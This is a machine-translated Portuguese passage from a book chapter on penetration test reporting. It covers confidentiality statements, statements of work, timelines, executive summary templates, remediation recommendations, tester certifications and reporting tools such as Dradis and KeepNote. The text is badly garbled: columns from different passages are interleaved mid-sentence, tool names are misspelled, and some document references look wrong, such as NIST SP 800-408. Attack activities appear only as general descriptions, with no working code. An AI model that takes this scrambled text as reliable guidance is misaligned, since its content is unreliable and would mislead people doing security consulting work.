2: Declarao de Comentrios lanamento do projeto e remediao ser copiado, os direitos de Confidencialidade Criado so fases obrigatrias distribuio, e outra linguagem Esta informao confidencial est Revisado para todas as outras fases. jurdica. Recomendamos que voc sendo fornecido ao PRESTADOR DE Revisado [284] tenha SERVIOS como 5/10/13 Mark Farina um indivduo com um fundo legal entrega deste trabalho de consultoria. Timeline Captulo 8 desenvolver a sua confidencialidade O nico propsito deste documento Timelines fornecer uma estimativa de Fase Engagement padro fornecer ao cliente com os resultados horas para cada fase de um projeto. Projeto Kickoff Meeting Declarao. e recomendaes deste compromisso. Timelines deve Tarefa (nvel alto) Exemplo 1: Declarao de Cada destinatrio concorda que eles incluir o nome de fase, tarefas a Demonstrao do trabalho de reviso. Confidencialidade vo seguir as restries de serem concludas, e durao prevista Configurao Deliverable. Negcio Este documento contm informaes distribuio de acordo com a para essa fase. e Q tcnico + A, Boundry reviso. confidenciais e privilegiadas do o acordo entre este agente consultoria Normalmente, a durao exibido em Pr-requists servio e prestador de servios. horas faturveis para que o cliente Ferramenta de preparao e FORNECEDOR. A informao [283] pode estimar o instalao. destinado para uso privado do cliente custo para cada fase do projeto. Footprinting, reviso de polticas, para a sua Penetration Test Relatrio Executivo Recomenda-se a incluir a lngua para mapeamento. compreenso do estado atual da Controle de documentos a qual Digitalizar para dispositivo. Reviso segurana da sua organizao. Ao importante listar qual a verso e fases so obrigatrias para evitar existente aceitar edies so feitas a uma proposta de pedidos para remover as fases infra-estrutura de rede Neste documento, O CLIENTE entrega. crticas, como o projeto Durao Estimada concorda em manter o contedo deste Provavelmente, muitas pessoas com kickoff. 8 Horas documento em uma variedade de conjuntos de Veja a seguir um cronograma Avaliao de Rede confiana e no copiar, divulgar, ou habilidades ir rever um documento. estimado e plano de implementao 16 Horas distribu-lo para todas as partes, Mudanas de rotulagem com as datas de alto nvel: 32 Horas excepto os e tipo de modificao vai ajudar os Rrovider Servio comear este Teste de Invaso que ir fornecer servios e / ou leitores alavancar o compromisso de iniciar duas semanas Sistema que pode ser identificar produtos diretamente aos clientes, verses mais recentes. depois de receber o explorados e executar teste caneta como resultado de Histria do Documento assinado declarao de trabalho sobre as recomendaes deste documento, Verso (SOW), e da ordem de compra do sistemas de destino. sem pedido por escrito para e por 1 cliente sujeita a recurso Anlise de relatrios, recomendaes escrito 2 disponibilidade. Se o cliente solicita e apresentaes confirmao do servio de provedor. 3 um compromisso data de incio 32 Horas Se voc no for o destinatrio Data acelerado, este deve 16 Horas pretendido, ser 5/1/13 ser negociado com Provedor de 6 Horas ciente de que qualquer divulgao, 5/24/13 Servios, Gerenciamento de Projetos, 2 Horas cpia ou distribuio deste documento Autor (es) e conta Team. Remediao Apresentao ou de suas partes Josh Wink Constatao atual e impacto de foi realizado para identificar possveis usado, e como voc lida com as segurana Penetration Test Relatrio Executivo vulnerabilidades e fornecer acionvel ameaas identificadas. comum para anlise, incluindo recomendaes Este projeto incluiu testes de recomendaes sobre remediar as desenvolver diagramas Projeto fechar penetrao de nove (9) os hosts vulnerabilidades para fornecer uma apresentando fluxo de processos e Resumo executivo internos. Para o teste, maior estruturas de relatrios de recursos O objetivo de um relatrio executivo PRESTADOR DE SERVIOS focada nvel de segurana para o meio para esta seo. fornecer uma viso geral de alto nvel no seguinte: ambiente. [286] de servios por que PRESTADOR DE SERVIOS usado Foram realizados. Os resumos Tente determinar o que as sua metodologia Teste de Invaso Captulo 8 executivos deve cobrir o que o levou vulnerabilidades de nvel de sistema provado As certificaes podem ajudar a at a questo ser poderia ser descoberto avaliar a segurana dos sistemas e mostrar a capacidade de um provedor abordados, a situao problemtica, e e explorados sem o conhecimento identificar potenciais falhas de de servios para proporcionar proposta de soluo com resultados prvio do ambiente ou notificao ao segurana. qualidade esperados. administradores. Exemplo 2: Sumrio Executivo resultados. Existem certificaes que Relatrios executivos no exigem Tentar explorar vulnerabilidades PRESTADOR DE SERVIOS AO destacam a capacidade da empresa detalhes tcnicos e devem visar a encontradas e acesso a informao CLIENTE empenhado para realizar de seguir comprovada liderana, em vez confidencial uma penetrao da rede metodologia de fluxo de negcios, tais de pessoal tcnico. que podem ser armazenados em Teste em um nmero quantificado de como a Organizao Internacional Exemplo 1: Sumrio Executivo sistemas. sistemas em sua rede. Estes sistemas para Background: Documentos e relatrio sobre todos os foram Normas certificaes (ISO) (Por CLIENTE envolvidos PRESTADOR achados. identificados pelos nmeros de host exemplo, ISO 9001 ou 14001). Outras DE SERVIOS para realizar uma 192.168.1.x, 10.1.1.x, e 172.16.1.X. A certificaes avaliao de vulnerabilidade finalidade poderia ser focado em uma tecnologia e teste de penetrao de seus Todos os testes levaram em desse compromisso foi o de identificar especfica, como tendo engenheiros sistemas. A finalidade do acoplamento considerao os processos de e priorizar as vulnerabilidades de certificados para foi avaliar o negcios reais implementadas pelo segurana no instalar a tecnologia que est sendo segurana das redes e sistemas de sistemas e suas ameaas em sistemas identificados. O engajamento solicitado. Certificaes de testes de clientes, identificando possveis falhas potencial e, portanto, os resultados foi lanada em [START DATE] e penetrao so Popular de segurana desta avaliao refletem uma incluiu o Certified Ethical Hacker (CEH) e neles, utilizando comprovada imagem realista dos nveis reais de quatro (4) dias de testes, anlise e GIAC Penetration Tester (GPEN), que metodologia de testes SERVIO do exposio a hackers online. documentao. ajudar a qualificar os recursos que provedor. O projeto Este documento contm os resultados Metodologia esto sendo contratados. foi realizada em um nmero de dessa avaliao. altamente recomendvel para Por Exemplo: Metodologia sistemas em segmentos de rede do Informaes sobre o projeto: fornecer uma viso geral de como PRESTADOR DE SERVIOS usado cliente, um O principal objetivo desta avaliao foi voc entregar servios. personalizado e ferramentas equipe de especialistas do provedor o de fornecer uma anlise de Destaques deve incluir o seu processo disponveis publicamente para ganhar de servio durante a data de segurana para cada fase de um noivado, perspectiva de admisso. falhas presentes em redes e sistemas ferramentas [285] do cliente. Esta avaliao postura de segurana da rede do Esta seo aborda detalhes do permitir a transferncia e execuo de [288] ponto de vista de um hacker. Estes envolvimento de servios. O pblico- arquivos. Um invasor com este nvel mtodos proporcionam alvo de acesso seria Captulo 8 CLIENTE com uma compreenso dos Normalmente o pessoal tcnico, eo ser capaz de interromper todos os Endereo IP riscos que ameaam a sua objetivo fornecer o mximo de processos de negcios que dependem 192.168.10.20 informao, e informaes desse host. 192.168.10.23 tambm os pontos fortes e fracos de possveis reas de preocupao em PRESTADOR DE SERVIOS tambm Hostname seus controles atuais protegendo torno identificados. Os clientes podem foi capaz de usar o Server Message SERV001 esses sistemas. querer desafiar um Block (SMB) Null SERV542 Os resultados foram alcanados e item realado e repita os passos Conta de usurio para enumerar os Portas TCP exigido pelo perfil de redes internas utilizados para validar a nomes de contas de usurios e grupos 42,53,88,135,139,445,464,53,636,102 CLIENTE vulnerabilidade, ou seja, do nome de domnio 5,1 usando informaes publicamente eles querem saber como as coisas Server (DNS). Um invasor pode usar 071,1075,1145 disponveis, o mapeamento da so descobertas, acessados e esta informao para ataques de 135,139,445,1433,3300 arquitetura de rede, identificando explorados. Estes dados phishing direcionados 135,139,445,1433,3389 hosts e servios, rede enumerando e tambm verifica todas as reas de sobre os trabalhadores do cliente ou 80,135,139,445,1443 vulnerabilidades de nvel de sistema, rede solicitados rotulados no mbito para conduzir ataques de adivinhao 135,139,445,1433,1434,3372,3389,50 descobrindo anfitries inesperados do trabalho ter sido de senhas fora bruta. 22, dentro do ambiente e eliminando falso enviada pelo prestador de servio. Um atacante que ganha credenciais 8400,8402 positivos que pode ter surgido a partir Normalmente, os assuntos a serem administrativas com sucesso para 135,139,445,1433,1434,3372,3389,50 de digitalizao. includos so alvos descoberta, criar outro usurio 22, DISCOVERY mapeamento, a vulnerabilidade contas e atribu-los a atingir as 8400,8402 Avaliar e avaliao, anlise da arquitetura, funes corporativas poderia usar 80443 Educar explorando, e relatrios. At que ponto informaes de usurios. 80 Alvos de mapeamento um servio No geral, os resultados identificar 192.168.10.154 SERV239 Remediar provedor vai em qualquer rea ameaas que podem ser mitigados 192.168.10.204 SERV777 Teste de Invaso baseada no que a declarao de atravs de dispositivo simples / 172.18.10.100 Metodologia trabalho define como o foco definies de configurao de 172.18.10.101 AVALIAO do noivado. software, juntamente com polticas de 172.18.10.105 Lockdown Por exemplo, apoio. 172.18.10.200 Alvos PRESTADOR DE SERVIOS foi A avaliao da vulnerabilidade e SERVSQL123 SEGURO capaz de acessar o host legado EMR testes de penetrao resumo: SERVSQL124 Alvos da Auditoria usando o padro CLIENTE desde PRESTADOR DE database.intern.com [287] credenciais de administrador do SERVIOS com os oito (8) endereos corp.com sistema para MS SQL. Esse acesso IP so listadas Resumo dos resultados Penetration Test Relatrio Executivo nos permitiu criar um na tabela a seguir. Esta gama foi O Resumo das concluses a carne Procedimentos de teste detalhadas conta de administrador, expor os digitalizada para determinar as portas por trs da proposta. Este o lugar processos do sistema, contas de e servios abertos onde os resultados usurio, arquivos de banco de dados e execuo nos hosts relacionados. dos servios so explicados, incluindo Crtico: Ameaa imediata para os Digitalizao TypeTotal explicando o problema com o fluxo de a forma como os itens identificados processos-chave de negcios Hosts trfego capturado que os clientes podem impactar negcios. Alta: Ameaa indireta a chave Portas possam qualificar o Como estes resultados so processos de negcio / ameaa de 9 recomendao. formatados vai determinar a reao do secundrio TCP UDP 1-65535, Alguns detalhes que poderiam ser seu cliente, por isso no processos de negcios Gravidade da Vulnerabilidade includos para vulnerabilidades consciente de no s o que dito, Meio: Indireta ameaa / parcial aos Crtico identificadas em um relatrio de mas tambm a forma como os dados processos de negcio Mdio entrega so apresentados. Baixa: No existe nenhuma ameaa Baixo so como se segue: A melhor prtica , incluindo uma direta; vulnerabilidade pode ser Total classificao de risco para ajudar os alavanca com outro 1 (nico: 1) clientes a entender como reagir vulnerabilidades 2 (singular: 2) aos itens identificados. Caractersticas [289] 2 (singular: 2) Nome Vulnerabilidade de classificao comum a nico definida como o nmero de Criticidade do negcio probabilidade, avaliao do risco, Penetration Test Relatrio Executivo diferentes vulnerabilidades encontrado Descrio Vulnerabilidade grficos, esquemas de cores e assim O nvel de risco atual de sistemas dentro de um nvel de risco. Por [290] por diante. Recomendamos incluindo testados, com base no nvel de risco exemplo, se cinco vulnerabilidades de tanto um grfico de resumo mais elevado dos resultados obtidos alto nvel foram Captulo 8 e seo detalhada sobre todos os em encontrado, mas trs so original, do itens identificados individualmente. sistemas crtico durante o ensaio, que algumas das vulnerabilidades so Para fazer backup de suas um total de um (1) Crtico, dois (2) apresentar em mais de um sistema. descobertas, Mdio, e Vulnerabilidades melhor prtica ter referncias a dois (2) Baixo vulnerabilidades foram Vulnerabilidades encontradas deve Detalhes tcnicos fontes pblicas sobre por que o ativo identificadas como mostrado na incluir uma descrio clara sobre a Os sistemas afetados identificado tem uma imagem seguinte: origem do Portas afetadas questo para validar ainda mais a sua Vulnerabilidade fraqueza, impacto nas operaes de Ao recomendada reivindicao. As fontes pblicas Vulnerabilidade A negcios e probabilidade de ser [291] poderia ser violaes em Vulnerabilidade B explorado. Relatrios conformidade, Vulnerabilidade C tambm deve listar como a Penetration Test Relatrio Executivo no encontrando um padro Vulnerabilidade D vulnerabilidade foi identificada Pode haver concluses gerais que mandatada ou explicao de uma Vulnerabilidade E juntamente com, se ele foi validado, voc gostaria de incluir alm vulnerabilidade conhecida de um Gravidade significado foi a vulnerabilidade vulnervel fonte respeitvel. Crtico explorada ou apenas identificada sistemas para mostrar valor adicional. Exemplo: Mdio como uma possvel vulnerabilidade Por exemplo, existe uma ordem que Mdio durante uma verificao. toda EUA Baixo Vulnerabilidades na arquitetura de um agncias federais tm equipamentos Baixo cliente pode incluir um diagrama capazes de suportar IPv6. No tendo Mesa de vero para os resultados da este no avaliao necessariamente uma vulnerabilidade, Esta seo explica as recomendaes ou coberturas esto includos os segurana da rede por meio de no entanto, algo que um cliente para remediar itens encontrados de servios de correios. Os clientes que aquisio de nossos servios. Devido federal dos EUA seria servios no conseguem uma auditoria ao impacto da geral interessado em saber. Outro exemplo fornecida. Recomendaes podem pode assumir os seus servios organizao como descoberto por seria apoiar as futuras tecnologias, variar de sugestes de alto nvel, anteriores so responsveis se voc este teste de penetrao, os recursos tais como capacidades para Voz sobre como "remendo no indicar seu adequados IP (VoIP) e vdeo. este sistema ", a passos muito servios, no garantem reunio recomendado para ser alocada para A seguir est uma lista de sugestes detalhados para fechar uma mandatos ou necessidades assegurar que os esforos de de itens para incluir em servios de vulnerabilidade. Algumas medidas de especficas. reparao so efectuadas Teste de Penetrao de remediao Por exemplo, existe uma grande em tempo hbil. Apesar de uma lista mostrar o valor adicional: poderia afetar outros servios, como diferena entre ter um relatrio PCI abrangente de itens que devem estar fechar as portas para defender de um includo com servios, em implementado est fora do mbito do ataque especfico, comparao com a contratao de um presente compromisso, alguns itens que tambm incapacita outro sistema especialista na verdade PCI de alto nvel so que utiliza esse canal para na reviso de todos os aspectos do importante mencionar. comunicao. Ele regulamento com a rede do cliente, importante incluir advertncias de em um mtodo semelhante ao Implementar um programa de possveis impactos negativos com utilizado pelos auditores. gerenciamento de patch: Muitas das qualquer sugeriram H muitos nveis de remediao. Por vulnerabilidades identificadas remediao, juntamente com a vezes, como a rede de arquitectura poderiam ser evitados com o Diferena em configuraes de confirmao de que os passos expe uma fraqueza, mas outras gerenciamento de patches adequada. arranque e de funcionamento para previstos no garantem para corrigir o vezes uma lacuna na poltica, Recomendamos seguinte dispositivos problema ou trazer um sistema em configurao ou as orientaes descritas no NIST SP Desvio Melhores prticas conformidade com a regulamentao remendo faltando. Os itens a incluir, 800-408 como uma fonte para o Suporte para IPv6 especfica. A ltima coisa por recomendaes so resumo das desenvolvimento de Fim de venda ou de final de voc iria querer um cliente que est concluses, polticas de segurana para dispositivos de vida sendo comprometida servios de de alto nvel e detalhadas gerenciamento de patches adequada. O suporte para as capacidades correios e ponto culpa recomendaes para remediao, Isto ir reduzir o risco de necessrias para VoIP e vdeo em voc por no fornecer etapas de outros dados teis execuo de sistemas vulnerveis. Conformidade com normas comuns, correo de sucesso para uma fora de itens solicitados, tais como as Impor controle de mudanas em todos como FISMA, PCI vulnerabilidade identificada capacidades de IPv6, mudanas no os sistemas: As vulnerabilidades Lista de nmeros de srie, endereo durante seus servios. projeto da rede, comuns so IP, MAC, e assim por diante de [292] recomendaes de hardware, causado por erro humano. Muitos dispositivos encontrados software, patches e resumo problemas de configurao incorreta Topologia de rede Captulo 8 cumprimento. poderia ser evitado Protocolos disponveis e dos dados muito importante afirmar em um Exemplo: atravs de uma mudana forte e virado pblico relatrio que garante entrega Louvamos ao cliente para ser pr- processo de controlo em todos os Consideraes de rede e de ativo na gesto de risco de tecnologia sistemas activos recomendaes e Multifatorial Alavancagem e controle estado de risco para a organizao. Um listas anexas informaes documentos incluem o seguinte: de acesso baseado em funo: Alguns Consulte NIST SP 800-309 para obter adicionais relacionadas com o sistemas crticos orientaes sobre relatrio entrega tipicamente Relatrio Executivo: Um resumo de Foram encontrados alavancando a funcionamento de um programa eficaz no essencial para as principais alto nvel do trabalho que voc est segurana da senha como os nicos de gesto de risco. concluses. Isto para fins de fazendo, o que meios de validar Incluir alta disponibilidade para referncia e pode conter voc espera realizar, e seu pblico- pessoas autorizadas. A melhor prtica sistemas crticos e redes: Durante a resultados da verificao, screenshots alvo .. ter, pelo menos, duas formas de nossa capturados, e outras informaes. Exemplo de SOW sumrio executivo autenticao, juntamente com a avaliao, encontramos pontos nicos Apndice 001 - Relatrios de a seguinte: limitao do acesso conta de de falha para sistemas de misso varredura de vulnerabilidades Nessus O prestador de servios tem o prazer administrao. crtica. <Captured Nessus Relatrio Printout> de apresentar o cliente com a nossa Restringir o acesso a sistemas A melhor prtica o desenvolvimento Glossrio metodologia para a realizao de uma crticos: Sistemas crticos devem ser de opes de failover em caso de Um glossrio usado para definir o avaliao de segurana. O principal isolados a partir de falha na rede. significado dos termos utilizados na objetivo da outros sistemas usando listas brancas, Um exemplo para um melhor trfego proposta. Isso poderia CLIENTE para iniciar este ACLs, VLANs e outros meios. O para o datacenter do ncleo a ser para definies tcnicas, compromisso o de avaliar o nvel projeto adio de especificando os requisitos atrs atual de risco conceito de privilgio mnimo vai sistemas redundantes para a rede de conformidade referenciados e exposio adequadamente dentro limitar a quantidade de dano que um centros de dados, como mostrado termos, ou outras reas que podem da organizao, tendo em vista o foco atacante pode abaixo. precisar de mais esclarecimentos. de desenvolver provocado usando um recurso Adicionais de Alta Disponibilidade [294] e / ou implementao de solues que comprometida. Consulte NIST SP Equipamento ajudaro a reduzir as ameaas crticas 800-27 RevA11 para VRRP Captulo 8 e, finalmente, orientaes sobre a obteno de uma Interruptor Declarao de Trabalho (SOW) mitigar o risco relevante. linha de base de segurana para Servidores Antes de oferecer servios de Em resposta s necessidades do sistemas de TI. NAT penetrao, pode ser necessrio cliente, servio provedor tem [293] Firewall escrever uma Declarao de Trabalho delineado um VRRP (SOW) que descreve o trabalho que estratgia de avaliao de segurana voc est indo para executar. Este eficaz, que tem provado ser muito Data Center normalmente o primeiro passo bem sucedido em Interruptor voc gostaria de completar com seus elevar a postura de segurana em Penetration Test Relatrio Executivo Servidores stakeholders antes de iniciar um muitas organizaes similares. Nossa VRRP projeto. abordagem comea Realizar avaliaes de vulnerabilidade NAT Ao escrever um SOW, recomendamos com a compreenso dos requisitos de regulares: As avaliaes de Firewall que voc siga um formato que negcio relacionados com a avaliao, vulnerabilidade VRRP acabar seguido por um mapeamento deve ser realizado numa base regular, Apndices representar a sua estrutura de detalhado topologia e base- como um meio para validar o actual Exemplo: comunicao. O formato bsico de revestimento do existente uma Declarao de Trabalho infra-estrutura para ser identificado no negcio consistente para avaliar e Relatrio de atividades: Um relatrio passos que voc est disposto a escopo. Aps a concluso da melhorar o de todas as faanhas executadas tomar durante o seu ataque. A DT descoberta do postura de segurana de uma (disponvel em trs tambm define quando voc infra-estrutura, comeamos uma organizao continuamente, e nveis de detalhe). vai parar de teste ou que avaliao de vulnerabilidade acreditamos que este compromisso Hospedar relatrio: Informaes de circunstncias esto fora do escopo. sistemtica de sistemas crticos e vai ajudar na reduo de despesas host detalhada, incluindo o nmero de Em outras palavras, a porca dispositivos de rede para identificar operacionais de riscos minimizados e computadores comprometidos, o d-lhe um ponto de parada. vetores de ameaas que podem ser tempo de inatividade, enquanto nmero mdio de vulnerabilidades O prximo exemplo mostra um resumo de natureza comportamental. Um tambm fornecendo proteo de explorados em cada computador, e os Teste de Invaso externa. Ele inclui cuidado dados e de marcas de reputao nomes CVE de vulnerabilidades um mtodo de explorao analisada e benefcios para o Cliente. encontrado em cada um dos viso geral do processo de teste, executada para identificar a relevncia [295] computadores. seguido de um esboo com o passo-a- da Relatrio de vulnerabilidade: Um passo vulnerabilidades que foram Penetration Test Relatrio Executivo relatrio detalhado de explorar com Instrues de trabalho que ser detectados. Tcnicas como a testes Alm disso, o conhecimento adquirido xito, contra realizada. Este exemplo tambm de penetrao e a partir de tal exerccio fundamental potenciais vulnerabilidades em cada descreve o engenharia social pode ser no planejamento para computador. cliente ea responsabilidade do empregado durante esta fase. Por fim, servios futuros que permitiro a Do lado do cliente Relatrio de teste proprietrio do aplicativo. passamos semanal realizao de negcios e de penetrao: A trilha de auditoria Teste web externo exemplo SOW: briefings de status em todo o ciclo de rentabilidade. Esses benefcios completa de cada lado do cliente [296] vida do compromisso de rever as sejam coerentes e bem alinhado com Teste de Invaso, incluindo o modelo atividades os objetivos do cliente listado como de e-mail enviado, explorar lanado, Captulo 8 para a semana e comunicar metas e segue: resultados dos testes (sucesso ou O objetivo central do nosso esforo objectivos essenciais para as falha), e detalhes sobre sistemas externo e Teste de Invaso web prximas semanas. comprometidos. explorar Isso proporciona cliente a Relatrio de usurio: Um relatrio de os pontos fracos do permetro da rede, oportunidade de informar os nossos teste do lado do cliente dos quais links domnio web, web e de segurana engenheiros de qualquer sistema foram clicados, quando inerentes atualizaes em andamento que Obter uma melhor compreenso de eles foram clicados, e por quem. entrega de aplicativos. Elementos de necessitam de ateno especial. potenciais vulnerabilidades da rede entrega de aplicativos adjacentes, PRESTADOR DE SERVIOS CLIENTE incluindo back-end fornece conhecimentos de gesto de e riscos de segurana bancos de dados e middleware, projectos credveis para garantir a Determine crtico arquitetura de Teste de Invaso Externa tambm esto includos neste domnio excelncia operacional e segurana fraqueza dentro do Uma ateno especial deve ser dada e so avaliados uma experincia superior ao cliente CLIENTE ao Teste de Invaso do externo bem. As vulnerabilidades comuns e em todos os nossos compromissos e infra-estrutura fontes. Um SOW Teste de Invaso exploits que concentrar-se durante este no excepo. Avaliar a segurana associado com o externo identifica seu alvo e possvel esta fase SERVIO DE FORNECEDOR site do cliente e reconhece uma necessidade de aplicaes de revestimento exterior so os relacionados a buffer Localizar endereos em PGP e Comunique-se a manuteno do Linha de Base overflows, injees de SQL e cross- WHOIS bancos de dados. servio e / ou impactos durante testes Auditoria e site scripting. Lanamento de vrios ataques de penetrao. Avaliar Nossos engenheiros tambm podem simultneos, para acelerar o Teste de Garantir a acessibilidade da web para Segurana envolver-se em um manual de Invaso domnios e dispositivos de permetro fraquezas navegao do domnio web para processo. de alcance se no Polticas de Segurana extrair outras peas de dados Interaja com mquinas comprometidas disponveis ao pblico. Normas confidenciais e crticos. Alm disso, atravs de agentes discretos que [297] Remediao conforme solicitado pelo esto instalados e CLIENTE, dispositivos na DMZ apenas na memria do sistema. Penetration Test Relatrio Executivo Melhores Prticas tambm ser includa neste Teste de Execute exploits locais para atacar Material adicional SOW Avaliar e Invaso mquinas internamente, em vez de Educar exerccio de uma tentativa de romper atravs do Outras reas a considerar quando se Risco logicamente as defesas em torno da rede. escreve um escopo de trabalho deve Exposio web Analisar aplicaes fora-de-the-box ser considerada. Alguns Lockdown domnio de aplicao. web para costume, e o contedo comum recomendado para e Procedimentos de teste detalhadas: falhas de segurana. incluir so os seguintes: Proteger PRESTADOR DE SERVIOS ir Validar exposies de segurana Liberao Legal e testes: Geralmente completar os seguintes procedimentos usando exploits geradas isso pr-aprovado palavreado dos Preo: Quanto tempo o trabalho de teste para a web dinamicamente, emulando advogados necessrio para concluir e quanto ele domnio de aplicao: um hacker tentando vrios caminhos e excluindo-se os proprietrios de vai custar. mtodos de ataque. aplicativos de realizar o prestador de Isso pode ser dividido em fases de Demonstrar as conseqncias de um servio responsvel por projeto e deve incluir notao ataque atravs da interao com o quaisquer danos causados pelo teste horas quando esperados servidor web de penetrao. potencialmente poderia exceder preo sistemas e bases de dados atravs de Metodologia e abordagem: Isto projetado. shells de comando e consoles de como voc pretende conduzir a As expectativas e responsabilidades: banco de dados de arquivo. penetrao O que o prestador de servios eo Realizar testes de penetrao sem Test (regras de engajamento), como o cliente corromper aplicaes web ou em cliente recebe atualizaes, so atribudos durante o ciclo de vida execuo cronogramas, do projeto. Deve haver notaes Identificar os servidores a serem cdigo em servidores de destino. e como o cliente pode fornecer quando testados, com base no site do cliente Responsabilidades do cliente so os entrada. O diagrama a seguir fornece passos necessrios por qualquer e rastreamento seguintes: uma prestador de servios ou cliente um um site para endereos colheita exemplo de uma metodologia SOW: pr-requisito para a publicado no site. futuro etapa do projeto. Alavancar os principais motores de Identificar o domnio web para o qual a Cartografia [298] busca para localizar endereos para avaliao web ser executada. e um determinado domnio. Descoberta Captulo 8 Armazenamento, SP) eEye Retina e fornecer uma senha que ser SAINT Certified Engineers Ameaa Guarda compartilhado entre os membros da Credenciais e ferramentas: Qualys Certified Engineers [299] equipe. Normalmente, os clientes verificar as Projeto sem fio Cisco Avanado Para iniciar sesso, crie um nome e credenciais detidos pelo Especialista Penetration Test Relatrio Executivo fornecer uma senha. Isso vai coloc-lo pessoal a realizao de auditorias, Project Management Professional do Kali ferramentas de relatrios no principal bem como quais as ferramentas pode PMI (PMP) Kali Linux inclui uma pequena seleo dashboard. Confira os assistentes e ser usada para completar Especialista Cisco Avanado Campo de ferramentas que podem ser usadas vdeos de demonstrao para tarefas. O fornecimento dessas de Segurana para a comunicao aprender mais sobre como usar informaes em uma DT acrescenta Especialista Cisco Avanado Campo organizar como uma equipe de Dradis em seus servios. um grau de credibilidade sem fio captura da informao, bem como [300] e profissionalismo. Fornecer o Cisco Mestre Segurana parceiro alguns utilitrios de criptografia. potencial inicial conjunto de especializado Aqui est um breve resumo de Captulo 8 ferramentas tambm reduz importante abordar as algumas das ferramentas que KeepNote a probabilidade de que o cliente tenha preocupaes que voc acredita que poderiam beneficiar a sua penetrao KeepNote um aplicativo de uma reao negativa quando um podem surgir adiantado. Nosso prtica de teste. anotaes. Voc pode armazenar negativo colega e amigo Willie Rademaker tem Dradis muitos tipos de notas e rapidamente impacto ocorre devido ao uso de uma uma frase clebre: "Sempre Dradis um framework open source ver tudo usando uma hierarquia de ferramenta. jogue o peixe na mesa ". Em outras para compartilhamento de notebook com texto rico e formatao O exemplo a seguir mostra uma tabela palavras, evitar ter surpresas quando informaes. Dradis fornece um de imagem. que destaca uma amostra de um projeto est sendo escopo. Se repositrio centralizado de KeepNote pode ser encontrado em Penetrao Rester voc acredita que pode haver um informaes para acompanhar o que Ferramentas de Relatrios percia, juntamente com as ponto de foi feito e |Documentao e selecionando ferramentas que sero utilizadas: conteno, abord-la na cabea. ainda precisa ser concluda. Dradis KeepNote. Certificaes e Credentials Surpresas so para aniversrios ... pode coletar informaes de membros Maltego CaseFile ISC2 Certified Information Security no de negcios. da equipe, CaseFile uma aplicao de Professional (CISSP) Testando Ferramentas fornecer ferramentas como o Nessus inteligncia visual usado para International Council of E-Commerce Kali Linix e Qualis, bem como a importao de determinar as relaes e Consultants (CEH) Backtrack 5 RC3 informaes, tais como mundo real liga entre centenas de Information Systems Audit and Control AirSnort listas de vulnerabilidade. diferentes tipos de informao. Isto faz Association (ISACA) AirCrack Para abrir Dradis, navegue at coleta de informaes e anlise de Informaes Certified Systems Auditor Airsnarf Ferramentas de Relatrios relacionamentos fceis para as (CISA) AirMagnet |Documentao e selecione Dradis. investigaes. RSA Authentication v8.0 Gerente Impacto Ncleo Dradis acessado atravs de um MagicTree RSA DLP Sute Certified Systems Santo navegador de Internet padro, MagicTree uma ferramenta de Engineer (CSE) Rpido 7 simplificando a colaborao produtividade Tester Penetrao RSA SecurID Escolha / Produtos Qualys entre grupos de pessoas. Para iniciar projetados para consolidao de Cisco Certified Internetwork Expert Metasploit uma sesso, selecione Novo projeto dados, (CCIE-RS, Segurana, Voz, Paliada para o Meta-Servidor consulta, a execuo do comando Se voc no for o destinatrio 1.3.2 Vulnerabilidade B Este teste de penetrao foi realizada externo e gerao de relatrios. A pretendido, estar ciente de que ............................................. durante <Date>. O relatrio detalhado informao armazenada qualquer divulgao, ...................... 6 sobre cada em uma estrutura de rvore, tornando cpia ou distribuio do contedo 1.3.3 Vulnerabilidade C. tarefa e nossos resultados so mais fcil para identificar os resultados deste documento proibida. ............................................ descritos a seguir. de exerccios anteriores e Detalhes do documento: ....................... 7 O objetivo do teste determinar as formato para fins de relatrio. Empresa: CLIENTE 1.4 Recomendaes vulnerabilidades de segurana nas [301] Documento: Relatrio de Teste de ................................................ configuraes Invaso ................ 8 e aplicaes web em execuo nos Penetration Test Relatrio Executivo Data: 1.5 Resumo servidores especificados como parte CutyCapt Classificao: Pblico ................................................ do escopo do trabalho. CutyCapt usado para capturar a Destinatrio: Empresa, nome, ttulo ............................ 10 Os testes so realizados assumindo a pgina web de renderizao do Histria de Documento: 2 Relatrio tcnico identidade de um atacante ou um Webkit em uma variedade de bitmap Data: Verso, autor, comentrios ............................................... usurio com malicioso e formatos vetoriais que incluem SVG, 1.0 Projecto .................. 12 inteno. PDF, PS, PNG, JPEG, TIFF, BMP e 2.0 Review 2.1 A segurana da rede 1.1.1 Abordagem GIF. Contedo: ............................................... Exemplos de relatrios 1 Sumrio Executivo ................ 12 A seguir, exemplo relatrios que voc ............................................... 2.1.1 ITEM 1 Realizar exames gerais para pode usar como modelos para as ................. 4 ............................................. identificar potenciais reas de entregas de construo para 1.1 Resumo ...................... 12 exposio e servios que seus clientes: ................................................ 2.1.2 ITEM 2 podem agir como pontos de entrada. Reportar testes de penetrao para o ............................. 4 ............................................. Realizar exames e investigaes para cliente do PRESTADOR DE 1.1.1 Abordagem ...................... 14 validar vulnerabilidades encontradas SERVIOS: .............................................. 2.2 vulnerabilidades em aplicaes alvo Este documento contm informaes ............................ 4 Web ............................................ 16 dos alvos identificados durante as de provedor de servio que [302] 3 Concluso verificaes gerais. confidenciais e privilegiadas. A ................................................ [303] informao destinado para o privado Captulo 8 ........................ 21 uso de CLIENTE. Ao aceitar este 1.2 Escopo Apndice Penetration Test Relatrio Executivo documento, voc concorda em manter ................................................ ................................................. o ................................. 5 .............................. 22 contedos em confiana e no copiar, 1.3 Principais concluses Sumrio Executivo divulgar ou distribuir este sem ............................................... 1.1 Sumrio confirmao pedido por escrito para e .............................. 6 CLIENTE atribuiu a tarefa de realizar por escrito do PRESTADOR DE 1.3.1 Vulnerabilidade A testes de penetrao de Quarterly SERVIOS. ............................................. <domnio>, ao PRESTADOR DE Teste de componentes identificados ...................... 6 SERVIOS. para obter acesso. Identificar e validar vulnerabilidades. Classificao vulnerabilidades com Explicao de vulnerabilidade Recomendao 3 Nmero de Vulnerabilidades base no nvel de ameaa, o potencial encontrada. Recomendao 4 Alta, mdia e informaes gravidade de perda e probabilidade de Recomendao para corrigir Recomendao 5 vulnerabilidades explorao. vulnerabilidade. 1.4.2 Recomendaes Estratgicas 100 Realizar atividades de pesquisa e 1.3.3 Vulnerabilidade C 35 desenvolvimento para apoiar a Explicao de vulnerabilidade As avaliaes de segurana pr-ativa: 21 anlise. Identificar encontrada. Como parte das melhores prticas de 68 questes de conseqncia imediata e Recomendao para corrigir segurana; Descrio recomendar solues. vulnerabilidade. O CLIENTE dever assegurar que [305] Fornecer recomendaes para 1.4 Recomendaes 